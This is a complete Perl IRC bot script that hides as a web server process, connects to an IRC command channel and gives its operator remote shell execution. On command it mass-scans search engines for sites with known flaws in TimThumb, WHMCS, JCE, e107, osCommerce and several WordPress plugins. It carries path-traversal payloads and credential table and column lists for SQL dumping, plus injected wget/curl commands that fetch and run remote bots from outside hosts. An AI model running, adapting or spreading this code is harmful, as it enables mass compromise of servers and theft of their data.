#!/usr/bin/perl

use HTTP::Request;
use HTTP::Request::Common;
use HTTP::Request::Common qw(POST);
use LWP::Simple;
use LWP 5.64;
use LWP::UserAgent;
use Socket;
use IO::Socket;
use IO::Socket::INET;
use IO::Select;
use MIME::Base64;
use URI::Escape;
use Digest::MD5 qw(md5_hex);

my $datetime    = localtime;
my @fakeprocs  	= ("-bash","/usr/sbin/httpd","/usr/local/psa/apache/bin/httpd -DFRONTPAGE -DHAVE_SSL","/usr/sbin/httpd -k start","/usr/sbin/apache2 -k start","php","/usr/local/php5/bin/php-cgi","/usr/local/apache/bin/httpd -k start -DSSL");
my $fakeproc    = $fakeprocs[rand(scalar(@fakeprocs))];
my $ircserver   = "irc.rindu.69.mu";
my $ircport   	= "6669";
my $nickname  	= "Joana[".int(rand(999))."]";
my $ident     	= "Joana[".int(rand(999))."]";
my $channel   	= "#scsj";
my $chanxxx	= "#scsj";
my $chaninfo	= "#scsj";
my $submitchan  = "#scsj";
my $admin    	= "sEm";
my $pv		= "sEm";
my $fullname    = "-_-";
my $rawmsg      = $ARGV[4];
my $msgraw      = $ARGV[5];

my $nob0dy	= "9,1[4+9]15 ViAr VersioN ";
my $whmcslogo	= "9,1[4+9]15 WHMCS 4<9+4> ";
my $thumblogo	= "9,1[4+9]15 TimThumb 4<9+4> ";
my $zerologo	= "9,1[4+9]15 zBoarD 4<9+4> ";
my $lfilogo	= "9,1[4+9]15 Lfi 4<9+4> ";
my $rfilogo	= "9,1[4+9]15 Rfi 4<9+4> ";
my $xmllogo	= "9,1[4+9]15 Xml 4<9+4> ";
my $oscologo	= "9,1[4+9]15 Osco 4<9+4> ";
my $ossqllogo	= "9,1[4!9]15 Osco - Sql 4<9=4> ";
my $e107logo	= "9,1[4+9]15 E107 4<9+4> ";
my $ihlogo	= "9,1[4+9]15 Is-Human 4<9+4> ";
my $zenlogo	= "9,1[4+9]15 ZenCart 4<9+4> ";
my $rfglogo	= "9,1[4+9]15 RfG 4<9+4> ";
my $sqllogo	= "9,1[4+9]15 Sql 4<9+4> ";
my $mmfclogo	= "9,1[4!9]15 MmFC 4<9=4> ";
my $jcelogo	= "9,1[4!9]15 JCE 4<9=4> ";
my $avmlogo	= "9,1[4!9]15 AVM 4<9=4> ";
my $ftplogo	= "9,1[4!9]15 FTP GAN 4<9=4> ";
my $whmcscmd	= '.whmcsz';
my $thumbcmd	= ".tb";
my $zerocmd	= ".zer";
my $lficmd	= ".lfi";
my $rficmd	= ".rfi";
my $xmlcmd	= ".xml";
my $jcecmd	= ".jce";
my $ihcmd	= ".human";
my $zencmd	= ".zen";
my $e107cmd	= ".e107";
my $rfgcmd	= ".rfg";
my $mmfccmd	= ".m2fc";
my $avmcmd	= ".avm";
my $cmdlfi	= ".cmdlfi";
my $cmdxml	= ".cmdxml";
my $cmde107	= ".cmde107";
my $oscocmd	= '.oscz';
my $sqlcmd	= '.sqlz5';
my $ftpcmd	= ".ftp";
my $spreadMode	= 0;
my $zerowget	= 1;
my $zerolwp	= 1;
my $zerocurl	= 1;
my $gps		= 1;
my $gps2	= 1;
my $timot	= 10;
my $silentmode	= 0;
my $hostinjector = "picasa.com.blindsanddesignforless.com";
my $thumbid = "http://".$hostinjector."/xp.php";
my $botdid = "http://".$hostinjector."/win7.php";
my $botxdid = "http://".$hostinjector."/win8.php";
my $thumbshell = "http://".$hostinjector."/xp.php";
my $md5php = md5_hex($thumbid).".php";
my $md5bot = md5_hex($botdid).".php";
my $md5botx = md5_hex($botxdid).".php";
my $botid = "http%3A%2F%2F".$hostinjector."%2win7.php";
my $botxid = "http%3A%2F%2F".$hostinjector."%2win7.php";
my $amma = "http://hummingbirdhelicopters.us/wp-content/themes/sem.jpg";
my $injector = "http://hummingbirdhelicopters.us/wp-content/themes/injeck.txt?";
my $botshell = "http://picasa.com.blindsanddesignforless.com/bot.txt?";
my $botshell2 = "http://picasa.com.blindsanddesignforless.com/recky.jpg";
my $subticket = "/submitticket.php?step=2&deptid=1";
my $osc_shell = "sem.php";
my $iam_dumper = "dumper.php";
my $action = "/data/shells.php";
my $wgetdon = "?cmd=wget%20http%3A%2F%2F".$hostinjector."%2Fxp.php.php;wget%20http://picasa.com.blindsanddesignforless.com/bot.log;perl%20bot.log;rm%20-fr%20bot.log";
my $lwpdon = "?cmd=lwp-download%20-a%20http%3A%2F%2F".$hostinjector."%2Fxp.php.php;lwp-download%20-a%20http://picasa.com.blindsanddesignforless.com/bot.log;perl%20bot.log;rm%20-fr%20bot.log";
my $curldon = "?cmd=curl%20-C%20-%20-O%20http%3A%2F%2F".$hostinjector."%2Fxp.php.php;curl%20-C%20-%20-O%20http://picasa.com.blindsanddesignforless.com/bot.log;perl%20bot.log;rm%20-fr%20bot.log";
my @bypasser = ("http://www.sporthorses.lv/sh//google.php","http://shop.visualstatements.co.uk//wp-content/uploads/products_img/google.php");
my $bypass = $bypasser[rand(scalar(@bypasser))];
my @bypasser2 = ("http://www.sporthorses.lv/sh//google.php","http://www.stcatherineswalledgarden.co.uk/wp-content/plugins/mm-forms-community/upload/temp/google.php"); 
my $bypass2 = $bypasser2[rand(scalar(@bypasser2))];
my $uagent    = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6";
my $lfdtest   = "../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%0000";
my $jack	= "http://hummingbirdhelicopters.us/wp-content/themes/error.php?____pgfa=http%253A%252F%252Fwww.google.com%252Fsearch?q=";
my $iamz	= "http://hummingbirdhelicopters.us/wp-content/themes/error.php?____pgfa=http%253A%252F%252Fwww.google.com%252Fsearch?q=";
my $cemonk	= "http://hummingbirdhelicopters.us/wp-content/themes/error.php?____pgfa=http%253A%252F%252Fwww.google.com%252Fsearch?q=";
my $semangad	= "http://hummingbirdhelicopters.us/wp-content/themes/error.php?____pgfa=http%253A%252F%252Fwww.google.com%252Fsearch?q=";
my $punta	= "http://hummingbirdhelicopters.us/wp-content/themes/error.php?____pgfa=http%253A%252F%252Fwww.google.com%252Fsearch?q=";
my $engine	= "GooGLe,GooGLe2,WaLLa,YaHoo,NadJi,GuTSeR,AsK,Bing,OnEt,CLusTy,SaPo,AoL,UoL,LyCos,HotBot,BigLobe,SeZNam,WeBCrawLeR,PaGiNa,CaDa,WitCh,aMidaLLa,KvaSiR,BaiDu,GiBLa,MyWeBSearcH,DogPile,TeoMa,VolUnIa,IzItO,AmFibi,AnAnZi,RiCeRca,AvG,FiReBaLL,DmoZ,YahooHK,RambLer,MaMa,Msn,IaMSeaCrh,PaPa,Ask2,Bypass,Bypass2,GiGaBLaST,SnZ,Commercial,Network,UniTed,Poland,Russian,Turkey,Ukraine,Australia,Brazil,Czech,Romania,Netherlands,Canada,Kingdom,Germany,Organization,Territory,Chile,Samoa,Spain,Indonesia,Thailand,Morocco,France,Sweden,Italy,Hungary,Mexico,Bulgaria,Bolivia,Slovenia,Switzerland,Latvia,Kenya,Singapore,Kazakhstan,Vietnam,Lithuania,Information,Mozambique,Iceland,Austria,Greece,India,Malaysia,Europe,Japan,Andorra,Helena,Portugal,Israel,Argentina,Belarus,Moldova,Cocos,Proffessional,Biz";
#####################################################################
my @tabele	= ('admin','tblUsers','tblAdmin','user','users','username','usernames','usuario',
				'name','names','nombre','nombres','usuarios','member','members','admin_table','miembro','miembros','membername','admins','administrator',
				'administrators','passwd','password','passwords','pass','Pass','tAdmin','tadmin','user_password','user_passwords','user_name','user_names',
				'member_password','mods','mod','moderators','moderator','user_email','user_emails','user_mail','user_mails','mail','emails','email','address',
				'e-mail','emailaddress','correo','correos','phpbb_users','log','logins','login','registers','register','usr','usrs','ps','pw','un','u_name','u_pass',
				'tpassword','tPassword','u_password','nick','nicks','manager','managers','administrador','tUser','tUsers','administradores','clave','login_id','pwd','pas','sistema_id',
				'sistema_usuario','sistema_password','contrasena','auth','key','senha','tb_admin','tb_administrator','tb_login','tb_logon','tb_members_tb_member',
				'tb_users','tb_user','tb_sys','sys','fazerlogon','logon','fazer','authorization','membros','utilizadores','staff','nuke_authors','accounts','account','accnts',
				'associated','accnt','customers','customer','membres','administrateur','utilisateur','tuser','tusers','utilisateurs','password','amministratore','god','God','authors',
				'asociado','asociados','autores','membername','autor','autores','Users','Admin','Members','Miembros','Usuario','Usuarios','ADMIN','USERS','USER','MEMBER','MEMBERS','USUARIO','USUARIOS','MIEMBROS','MIEMBRO');
my @kolumny	= ('admin_name','cla_adm','usu_adm','fazer','logon','fazerlogon','authorization','membros','utilizadores','sysadmin','email',
				'user_name','username','name','user','user_name','user_username','uname','user_uname','usern','user_usern','un','user_un','mail',
				'usrnm','user_usrnm','usr','usernm','user_usernm','nm','user_nm','login','u_name','nombre','login_id','usr','sistema_id','author',
				'sistema_usuario','auth','key','membername','nme','unme','psw','password','user_password','autores','pass_hash','hash','pass','correo',
				'userpass','user_pass','upw','pword','user_pword','passwd','user_passwd','passw','user_passw','pwrd','user_pwrd','pwd','authors',
				'user_pwd','u_pass','clave','usuario','contrasena','pas','sistema_password','autor','upassword','web_password','web_username');
#####################################################################
$SIG{'INT'}   = 'IGNORE';
$SIG{'HUP'}   = 'IGNORE';
$SIG{'TERM'}  = 'IGNORE';
$SIG{'CHLD'}  = 'IGNORE';
$SIG{'PS'}    = 'IGNORE';
#chdir("/");
chop (my $priper = `wget http://picasa.com.blindsanddesignforless.com/sem.jpg -O sem.jpg;wget http://picasa.com.blindsanddesignforless.com/ddos.jpg -O ddos.jpg;wget http://picasa.com.blindsanddesignforless.com/dumper.jpg -O dumper.jpg;wget http://picasa.com.blindsanddesignforless.com/cgi.jpg -O cgi.jpg`);
$ircserver = "$ARGV[0]" if $ARGV[0];
$ircport = "$ARGV[1]" if $ARGV[1];
$nickname = "$ARGV[2]" if $ARGV[2];
$channel = "$ARGV[3]" if $ARGV[3];
$0 = "$fakeproc"."\0" x 16;
my $pid = fork;
exit if $pid;
die "\n[!] Something Wrong !!!: $!\n\n" unless defined($pid);

our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();
$sel_client = IO::Select->new();
sub sendraw {
    if ($#_ == '1') {
    my $socket = $_[0];
    print $socket "$_[1]\n";
    } else {
        print $IRC_cur_socket "$_[0]\n";
    }
}
sub connector {
    my $mynick = $_[0];
    my $ircserver_con = $_[1];
    my $ircport_con = $_[2];
    my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$ircserver_con", PeerPort=>$ircport_con) or return(1);
    if (defined($IRC_socket)) {
        $IRC_cur_socket = $IRC_socket;
        $IRC_socket->autoflush(1);
        $sel_client->add($IRC_socket);
        $irc_servers{$IRC_cur_socket}{'host'} = "$ircserver_con";
        $irc_servers{$IRC_cur_socket}{'port'} = "$ircport_con";
        $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
        $irc_servers{$IRC_cur_socket}{'myip'} = $IRC_socket->sockhost;
        nick("$mynick");
        sendraw("USER $ident ".$IRC_socket->sockhost." $ircserver_con :$fullname");
        sleep(1);}}

sub parse {
    my $servarg = shift;
    if ($servarg =~ /^PING \:(.*)/) {
        sendraw("PONG :$1");
    }
    elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
        if (lc($1) eq lc($mynick)) {
            $mynick = $4;
            $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
        }
    }
    elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
        nick("$mynick".int rand(1));
    }
    elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
        $mynick = $2;
        $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
        $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
        sendraw("MODE $mynick +Bx");
        sendraw("NS id sitirahma");
        sleep(3);
        sendraw("JOIN $channel correct");
        sendraw("JOIN $chanxxx balekos");
        sleep(1);
	sendraw("PRIVMSG $channel :9,1[4!9]15 Scanner Update Oleh $admin 9,1[4!9]");
        sendraw("PRIVMSG $admin :Hi $admin im here !!!");
    }
}

my $line_temp;
while( 1 ) {
    while (!(keys(%irc_servers))) { connector("$nickname", "$ircserver", "$ircport"); }
    select(undef, undef, undef, 0.01);
    delete($irc_servers{''}) if (defined($irc_servers{''}));
    my @ready = $sel_client->can_read(0);
    next unless(@ready);
    foreach $fh (@ready) {
        $IRC_cur_socket = $fh;
        $mynick = $irc_servers{$IRC_cur_socket}{'nick'};
        $nread = sysread($fh, $ircmsg, 4096);
        if ($nread == 0) {
            $sel_client->remove($fh);

            $fh->close;
            delete($irc_servers{$fh});
        }
        @lines = split (/\n/, $ircmsg);
        $ircmsg =~ s/\r\n$//;
        if ($ircmsg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
            my ($nick,$ident,$host,$path,$msg) = ($1,$2,$3,$4,$5);			
            if ($path eq $mynick) {
				if ($msg =~ /^
PING (.*)
/) {
					sendraw("NOTICE $nick :
PING $1
");
				}
				if ($msg =~ /^
VERSION
/) {
					sendraw("NOTICE $nick :
VERSION mIRC v6.21 Khaled Mardam-Bey
");
				}
				if ($msg =~ /^
TIME
/) {
					sendraw("NOTICE $nick :
TIME ".$datetime."
");
				}
				if (&isAdmin($nick) && $msg eq "!die") {
					&shell("$path","kill -9 $$");
				}
				if (&isAdmin($nick) && $msg eq "!killall") {
					&shell("$path","killall -9 perl");
				}
				if (&isAdmin($nick) && $msg eq "!reset") {
					sendraw("QUIT :Restarting...");
				}
				if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) {
					sendraw("JOIN #".$1);
				}
				if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) {
					sendraw("PART #".$1);
				}
				if (&isAdmin($nick) && $msg =~ /^!nick (.+)/) {
					sendraw("NICK ".$1);
				}
				if (&isAdmin($nick) && $msg =~ /^!pid/) {
					sendraw($IRC_cur_socket, "PRIVMSG $nick :Fake Process/PID : $fakeproc - $$");
				}
				if (&isAdmin($nick) && $msg !~ /^!/) {
					&shell("$nick","$msg");
				}
				if (&isAdmin($nick) && $msg =~ /^!raw (.+)/) {
					sendraw("$rawmsg $msgraw ".$1);
				}
				if (&isAdmin($nick) && $msg =~ /^!say (.+)/) {
					sendraw("PRIVMSG $rawmsg ".$1);
				}
				if (&isAdmin($nick) && $msg =~ /^!act (.+)/) {
					sendraw("PRIVMSG $rawmsg :
ACTION ".$1."
");
				}
				if (&isAdmin($nick) && $msg =~ /^!chtcmd\s+(.*) -d/) {
					my $newthumbcmd = $1;
					$thumbcmd = $newthumbcmd;
					&msg("$admin","$thumblogo9 Scan Command change to4 $thumbcmd ");
				}
				if (&isAdmin($nick) && $msg =~ /^!chzcmd\s+(.*) -d/) {
					my $newzerocmd = $1;
					$zerocmd = $newzerocmd;
					&msg("$admin","$zerologo9 Scan Command change to4 $zerocmd ");
				}
				if (&isAdmin($nick) && $msg =~ /^!chwcmd\s+(.*) -d/) {
					my $newwhmcscmd = $1;
					$whmcscmd = $newwhmcscmd;
					&msg("$admin","$whmcslogo9 Scan Command change to4 $whmcscmd ");
				}
				if (&isAdmin($nick) && $msg =~ /^!chxcmd\s+(.*) -d/) {
					my $newxmlcmd = $1;
					$xmlcmd = $newxmlcmd;
					&msg("$admin","$whmcslogo9 Scan Command change to4 $xmlcmd ");
				}
				if (&isAdmin($nick) && $msg =~ /^!timot\s+(.*) -d/) {
					my $newtimot = $1;
					$timot = $newtimot;
					&msg("$admin","9,1 Get Content TimeOut change to4 $timot ");
				}
				if (&isAdmin($nick) && $msg =~ /^!chxchan\s+(.+) -d/) {
					my $newchan = $1;
					$chanxxx = $newchan;
					&msg("$admin","9,1 xChan change to4 $chanxxx ");
				}
			}
			else {
				if (&isAdmin($nick) && $msg eq "!die") {
					&shell("$path","kill -9 $$");
				}
				if (&isAdmin($nick) && $msg eq "!killall") {
					&shell("$path","killall -9 perl");
				}
				if (&isAdmin($nick) && $msg eq "!reset") {
					sendraw("QUIT :Restarting...");
				}
				if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) {
					sendraw("JOIN #".$1);
				}
				if (&isAdmin($nick) && $msg eq "!part") {
					sendraw("PART $path");
				}
				if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) {
					sendraw("PART #".$1);
				}
				if (&isAdmin($nick) && $msg =~ /^\.sh (.*)/) {
					&shell("$path","$1");
				}
				if (&isAdmin($nick) && $msg =~ /^$mynick (.*)/) {
					&shell("$path","$1");
				}
				if ($msg=~ /^!silent\s+(.*) -d/) { 
					$smod = $1;
				if ($smod =~ /ON/) { $silentmode = 1; $silentstat = "ON"; }
				elsif ($smod =~ /OFF/) { $silentmode = 0; $silentstat = "OFF"; }
					&msg("$path","9,1[4!9]Silent Mode15 $silentstat !!!!");
				}
				if ($msg=~ /^!jackx\s+(.*) -d/) {
					$engmod = $1;
				if ($engmod =~ /ON/) { $gps = 1; $gpsstat = "ACTIVATED"; }

				elsif ($engmod =~ /OFF/) { $gps = 0; $gpsstat = "DEACTIVATED"; }
					&msg("$path","9,1[4!9]Jack Engine15 $gpsstat !!!!");
				}
				if ($msg=~ /^!engine\s+(.*) -d/) {
					$engmod = $1;
				if ($engmod =~ /ON/) { $gps2 = 1; $gpsstat = "ACTIVATED"; }
				elsif ($engmod =~ /OFF/) { $gps2 = 0; $gpsstat = "DEACTIVATED"; }
					&msg("$path","9,1[4!9]Multi Engine15 $gpsstat !!!!");
				}
				if (&isAdmin($nick) && $msg =~ /^!injector\s+(.*) -d/) {
					$newhostinjector= $1;
					$hostinjector = $newhostinjector;
					&msg("$path","9,1[4!9]Injector 15change to4 $hostinjector ");
				}
				if ($msg=~ /^$cmdlfi\s+(.*?)\s+(.*)/){
					my $url = $1.$lfdtest;
					my $cmd = $2;
					&cmdlfi($url,$cmd,$path);
				}
				if ($msg=~ /^$cmdxml\s+(.*?)\s+(.*)/){
					my $url = $1;
					my $cmd = $2;
					&cmdxml($url,$cmd,$path);
				}
				if ($msg=~ /^$cmde107\s+(.*?)\s+(.*)/){
					my $url = $1;
					my $cmd = $2;
					&cmde107($url,$cmd,$path);
				}
                ##################################################################### HELP COMMAND
				if ($msg=~ /^!help/) {
					my $helplogo = "9,1[4!9]15 Help 4<9=4> ";
					&msg("$path","$helplogo9Timthumb Vuln Scan:15 $thumbcmd [bug] [dork] ");
					&msg("$path","$helplogo9SQL Vuln Scan:15 $sqlcmd [bug] [dork] ");
					&msg("$path","$helplogo9RFI Vuln Scan:15 $rficmd [bug] [dork] ");
					&msg("$path","$helplogo9LFI Vuln Scan:15 $lficmd [bug] [dork] ");
					&msg("$path","$helplogo9XML Vuln Scan:15 $xmlcmd [bug] [dork] ");
					&msg("$path","$helplogo9e107 Vuln Scan:15 $e107cmd [dork] ");
					&msg("$path","$helplogo9WHMCS Vuln Scan:15 $whmcscmd [dork] ");
					&msg("$path","$helplogo9ZeroBoard Vuln Scan:15 $zerocmd [dork] ");
					&msg("$path","$helplogo9RFG Vuln Scan:15 $rfgcmd [bug] [dork] ");
					&msg("$path","$helplogo9osCommerce Vuln Scan:15 $oscocmd [dork] ");
					&msg("$path","$helplogo9MMfC Vuln Scan:15 $mmfccmd [dork] ");
					&msg("$path","$helplogo9AVm Vuln Scan:15 $avmcmd [dork] ");
					&msg("$path","$helplogo9ZenCart Vuln Scan:15 $zencmd [dork] ");
					&msg("$path","$helplogo9Human Vuln Scan:15 $ihcmd [dork] ");
					&msg("$path","$helplogo9Jce Vuln Scan:15 $jcecmd [dork] ");
				}
                if (&isAdmin($nick) && $msg =~ /^!pid/) {
                    &msg("$nick","6Fake Process/PID : $fakeproc - $$");
                }
                if ($msg=~ /^!respon/ || $msg=~ /^!id/) {
                    if (&isFound($injector,"c0Vt=")) {
                        &msg("$path","9,1[4!9] Injector 4<9=4>9 Ready!!! ");
                    } else {
                        &msg("$path","9,1[4!9] Injector 4<9=4>15 Lost!!! ");
                    }
                }
				
				if ($msg=~/^!bypass/){
					my $bystats1 = "";
					my $cekby1 = &get_content($jack."search");
					if ($cekby1 =~ /search/i){ $bystats1 = "9 Up!!!"; } else { $bystats1 = "4 Lost!!!"; }
					&msg("$path","9,1[4!9] Bypass 4<9=4>15 JacK1=$bystats1")
				}}
                ##################################################################### SCAN
		if ($msg=~ /^$sqlcmd\s+(.+?)\s+(.*)/) {
                    if (my $pid = fork) {
                        waitpid($pid, 0);
                    }
                    else {
                        if (fork) { exit; } else {
                            my ($bug,$dork) = ($1,$2);
			    my $simpan = 'situs.txt';
				&msg("$path","9,1[4!9]15 Lapor 4<9=4> 15lagi scan SQL di 4$path ");
				&msg("$path","$sqllogo9,1Dork 4<9=4>15 $dork ");
				&msg("$path","$sqllogo9,1Bugz 4<9=4>4,1 $bug ");
				&msg("$path","$sqllogo9Search Engine 4,1<9=4>15,1 Now Loading ... ");
				&msg("$path","$sqllogo7ATTENTION : 8,1Don't flood the bot.. 11OK!!!");
				sendraw("MODE $path +m");
				&se_start($path,$bug,$dork,$engine,12,$nick);
                        }
                        exit;
                    }
                }
		if ($msg =~ /^$mmfccmd\s+(.*)/) {
					if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
						my ($bug,$dork) = ("wp-content/plugins/mm-forms-community/includes/doajaxfileupload.php",$1);
						my $simpan = 'situs.txt';
						&msg("$chanxxx","9,1[4!9]15Lapor 4<9=4> 9$nick 15lagi scan MMFC di 4$path ");
						&msg("$path","$mmfclogo9Dork 4<9=4>15 $dork ");
						&msg("$path","$mmfclogo9Search Engine 4<9=4>15 Loading ");
						sendraw("MODE $path +m");
						&se_start($path,$bug,$dork,$engine,13,$nick);
					}
					}
				}
				if ($msg =~ /^$avmcmd\s+(.*)/) {
					if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
						my ($bug,$dork) = ("wp-content/plugins/html5avmanager/lib/uploadify/custom.php",$1);
						my $simpan = 'situs.txt';
						&msg("$chanxxx","9,1[4!9]15Lapor 4<9=4> 9$nick 15lagi scan HTML5 AV Manager di 4$path ");
						&msg("$path","$avmlogo9Dork 4<9=4>15 $dork ");
						&msg("$path","$avmlogo9Search Engine 4<9=4>15 Loading ");
						sendraw("MODE $path +m");
						&se_start($path,$bug,$dork,$engine,14,$nick);
					}
					}
				}
                if ($msg =~ /^$lficmd\s+(.+?)\s+(.*)/) {
					if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
					my ($bug,$dork) = ($1,$2);
					my $simpan = 'situs.txt';
						if (&isFound($injector,"c0Vt=")) {
							&msg("$path","9,1[4!9]15 Lapor 4<9=4> 15lagi scan LFI di 4$path ");
							&msg("$path","$lfilogo9Dork 2,1<4=2>4,1 $dork ");
							&msg("$path","$lfilogo9Bugz 2,1<4=2,1>4,1 $bug ");
							&msg("$path","$lfilogo9Search Engine 4,1<9=4>15,1 Now Loading ... ");
							&msg("$path","$lfilogo7ATTENTION : 8,1Don't flood the bot.. 11OK!!!");
							sendraw("MODE $path +m");
							&se_start($path,$bug,$dork,$engine,3,$nick);
							} else {
							&msg("$path","9,1[4!9]Injector 4<9=4>15 Lost!!! "); exit;
							}
						}
					}
				}
                if ($msg =~ /^$rficmd\s+(.+?)\s+(.*)/) {
					if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
					my ($bug,$dork) = ($1,$2);
					my $simpan = 'situs.txt';
						if (&isFound($injector,"c0Vt=")) {
							&msg("$path","9,1[4!9]15 Lapor 4<9=4> 15lagi scan RFI di 4$path ");
							&msg("$path","$rfilogo9,1Dork 4,1<9=4>15 $dork ");
							&msg("$path","$rfilogo9,1Bugz 4,1<9=4>15,1 $bug ");
							&msg("$path","$rfilogo9Search Engine 4,1<9=4>15,1 Now Loading ... ");
							&msg("$path","$rfilogo7ATTENTION : 8,1Don't flood the bot.. 11OK!!!");
							sendraw("MODE $path +m");
							&se_start($path,$bug,$dork,$engine,5,$nick);
							} else {
							&msg("$path","9,1[4!9]Injector 4<9=4>15 Lost!!! "); exit;
							}
						}
					}
				}
                if ($msg =~ /^$xmlcmd\s+(.+?)\s+(.*)/) {
					if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
					my ($bug,$dork) = ($1,$2);
					my $simpan = 'situs.txt';
							&msg("$path","9,1[4!9]15 Lapor 4<9=4> scan XML di 4$path ");
							&msg("$path","$xmllogo9,1Dork 4<9=4>15 $dork ");
							&msg("$path","$xmllogo9,1Dork 4<9=4>15 $dork ");
							&msg("$path","$xmllogo9Search Engine 4,1<9=4>15,1 Now Loading ... ");
							&msg("$path","$xmllogo7ATTENTION : 8,1Don't flood the bot.. 11OK!!!");
							sendraw("MODE $path +m");
							&se_start($path,$bug,$dork,$engine,6,$nick);
						}
					}
				}
                if ($msg =~ /^$thumbcmd\s+(.+?[.php])\s+(.*)/) {
					if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
					my ($bug,$dork) = ($1,$2);
					my $simpan = 'situs.txt';
						if ($bug =~ m/\/coreunix(.+?)/i){ &msg("$path","9,1[4!9]Bug nya gak usah pakek \/ di depan :p "); exit; } else {
						if (&isFound($thumbid,"GIF89")) {
							&msg("$path","9,1[4!9]15 Lapor 4<9=4> 15lagi scan TimTHumb di 4$path ");
							&msg("$path","$thumblogo9,1Dork 4<9=4>4,1 $dork ");
							&msg("$path","$thumblogo9,1Bugz 4<9=4>4,1 $bug ");
							&msg("$path","$thumblogo9Search Engine 4,1<9=4>15,1 Now Loading ... ");
							&msg("$path","$thumblogo7ATTENTION : 8,1Don't flood the bot.. 11OK!!!");
							sendraw("MODE $path +m");
							&se_start($path,$bug,$dork,$engine,1,$nick);
							} else {
							&msg("$path","9,1[4!9]Injector 4<9=4>15 Lost!!! "); exit; }
							}
						}
					}
				}
				if ($msg =~ /^$jcecmd\s+(.*)/) {
 					if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
 						my ($bug,$dork) = ("/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b",$1);
 						my $simpan = 'situs.txt';
 						&msg("$chanxxx","9,1[4!9]15Lapor 4<9=4> 9$nick 15lagi scan JCE di 4$path ");
 						&msg("$path","$jcelogo9,1Dork 4<9=4>15 $dork ");
 						&msg("$path","$jcelogo9Search Engine 4,1<9=4>15,1 Now Loading ... ");
						&msg("$path","$jcelogo7ATTENTION : 8,1Don't flood the bot.. 11OK!!!");
 						sendraw("MODE $path +m");
						&se_start($path,$bug,$dork,$engine,15,$nick);
 				}
 			}
 		}
                if ($msg =~ /^$whmcscmd\s+(.*)/) {
                	if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
						my ($bug,$dork) = ($1,$2);
						my $simpan = 'situs.txt';
							&msg("$path","9,1[4!9]15 Lapor 4<9=4> 15lagi scan WHMCS di 4$path ");

							&msg("$path","$whmcslogo9,1Dork 4<9=4>15,1 $dork ");
							&msg("$path","$whmcslogo9Search Engine 4,1<9=4>15,1 Now Loading ... ");
							&msg("$path","$whmcslogo7ATTENTION : 8,1Don't flood the bot.. 11OK!!!");
							sendraw("MODE $path +m");
							&se_start($path,$bug,$dork,$engine,2,$nick);
						}
					}
				}
                if ($msg =~ /^$zerocmd\s+(.*)/) {
                	if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
						if (&isFound($thumbid,"GIF89")) {
						my ($bug,$dork) = ("zboard.php?id=byroe",$1);
						my $simpan = 'situs.txt';
							&msg("$path","9,1[4!9]15 Lapor 4<9=4> 15lagi scan zboard di 4$path ");
							&msg("$path","$zerologo9,1Dork 4<9=4>15 $dork ");
							&msg("$path","$zerologo9Search Engine 4,1<9=4>15,1 Now Loading ... ");
							&msg("$path","$zerologo7ATTENTION : 8,1Don't flood the bot.. 11OK!!!");
							sendraw("MODE $path +m");
							&se_start($path,$bug,$dork,$engine,4,$nick);
							} else {
							&msg("$path","9,1[4!9]Injector 4<9=4>15 Lost!!! ");
							}
						}
					}
				}
                if ($msg =~ /^$e107cmd\s+(.*)/) {
                	if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
						if (&isFound($amma,"c0Vt=")) {
						my ($bug,$dork) = ("contact.php",$1);
						my $simpan = 'situs.txt';
							&msg("$path","9,1[4!9]15 Lapor 4<9=4> 15lagi scan E107 di 4$path ");
							&msg("$path","$e107logo9,1Dork 4<9=4>15 $dork ");
							&msg("$path","$e107logo9Search Engine 4,1<9=4>15,1 Now Loading ... ");
							&msg("$path","$e107logo7ATTENTION : 8,1Don't flood the bot.. 11OK!!!");
							sendraw("MODE $path +m");
							&se_start($path,$bug,$dork,$engine,7,$nick);
							} else {
							&msg("$path","9,1[4!9]Injector 4<9=4>15 Lost!!! ");
							}
						}
					}
				}
                if ($msg =~ /^$ihcmd\s+(.*)/) {
                	if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
						if (&isFound($thumbid,"GIF89")) {
						my ($bug,$dork) = ("wp-content/plugins/is-human/engine.php",$1);
						my $simpan = 'situs.txt';
							&msg("$path","9,1[4!9]15 Lapor 4<9=4> 15lagi scan Is-Human di 4$path ");
							&msg("$path","$ihlogo9,1Dork 4<9=4>15 $dork ");
							&msg("$path","$ihlogo9Search Engine 4,1<9=4>15,1 Now Loading ... ");
							&msg("$path","$ihlogo7ATTENTION : 8,1Don't flood the bot.. 11OK!!!");
							sendraw("MODE $path +m");
							&se_start($path,$bug,$dork,$engine,8,$nick);
							} else {
							&msg("$path","9,1[4!9]Injector 4<9=4>15 Lost!!! ");
							}
						}
					}
				}
